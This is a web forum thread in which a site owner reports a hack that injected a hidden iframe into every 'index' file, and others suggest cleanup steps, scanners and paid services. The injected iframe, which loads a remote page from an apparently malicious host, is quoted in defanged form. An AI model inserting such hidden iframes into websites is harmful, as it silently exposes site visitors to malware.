My Website got hacked by someone

Hi all,

I used Hostmonster,Hostgator,DreamHost

My website got hacked by someone and insert this code in tho file name begine with "index"

"<iframe src='hxxp://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>"

I try to removed this code from every file name begin "index" but it's to difficult to remove all because my website have many subdomain and subdirectory in deep directory. Please suggestion me how can I do to solved this problem

Thank you very much

 

happened to me & thanks god - I had backup ready

trashed all the files execpt database & reloaded the backup.

and paid someone to fix the script. It happened to me when i used a cheap script bought from one of the forums..

 

anyone have this script "Advanced Online Search and Replace PHP Script " send me please. this script help me to remove this code "<iframe src='hxxp://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>" from all file infected and replace with space. I found this scirpt at hxxp://www.download32.com/go/22756/http%3A%2F%2Fwww.rightscripts.com%2Fdemo%2Freplace.zip/ but it's demo version and expired.

 

Which is why you ask somebody who knows what they're talking about to verify the scripts you buy off untrusted sources...

Sorry mate, I can't really give you advice. I'm completely useless at this stuff.

 

Do you have SSH access?

 

This thing happened to me too.
I was wondering how did something like that happened till i figured that.

Its a Host security issue and I wrote about it here:
http://www.freelancer-id.com/content/must-know-secure-your-host

Try to read it and follow the instructions to be sure about the security.

wish you all good luck

 

try searching hotscripts for a freeware script. and if you have some programming knowledge, its very easy to code it on your own.

 

I'm at a complete loss as to why people still think this is an issue with their host. Have some personal accountability.

Either way, I can remove it more than likely with ssh access.

 

Your FTP credentials are compromised.

I can help you to clean it.

 

Guys,

Download the "phpsecinfo" from PHP.net and run it on your host. It will show you the bad issues in your host and how to solve it.

Something else,
I am coding a secure code.. I didn't trust my self for a while, so i used Drupal to be sure.
I got the same result. New script was added to the files later.. And new folders and files created.
Before that I have changed my passwords. I am using iMac (no viruses).
Note: the host i am using is (dv) on MediaTemple

 

Old thread, that I would like to add something. If your site got hacked, you can quickly scan it with http://sucuri.net to see where the malware is and also to monitor your site from now on (to avoid issues like that in the future).

* a bit promotional post, but I think can help people having the same issue.

 

This is why people need to stop buying crappily coded scripts from people and just write your own stuff.

 

There are so many ways to attack a website, it's just not possible to cater for them all on a constant basis if you're a small company, so the next best thing is to try and cover the most commonly found holes like the ones described in this article, and hope that puts off the intended attacker.

We use an automated file system scanner called Eyefile. It's good for detecting any kind of backdoor injection and works for any kind of website.

It can be found here:
http://www.website-security-tools.com/

Hope this helps.

 

Most hackers are "Script Kiddies" from my experience and most of the time they gain access through a script. Do you have any scripts that allow uploading?

 

As you know, upload scripts in PHP can be found all over the net. If you are using one of these scripts, it's not so much down to how 'well' the script is coded, it's more about how the server configuration and php.ini. is set. In general, PHP scripts are like a thin layer between the user and the server. They can try and do whatever they or their users want, but in the end what is and isn't allowed to happen by way of a PHP script is decided outside of the script itself.

What I'm saying is that if you're using an upload script make sure you are VERY familiar with all the related server/php.ini settings first.

The monitoring application I was referring to is for detecting scripts and other code being added to your site without your knowledge either as new files or altered existing ones.

 

Google finds on average 9,000 new maliocous websites every day. We are at iLockout and are here to lower that number. We specialize in google blacklist removal, and website protection on an annual basis. Not only do we fix your site the day you sign up, but scan it daily and fix and any issues as the arise. Check us out we are currently running a special for the next two weeks, simply email through our site or call (866)408-9152 ext.102 to recieve details on our specials.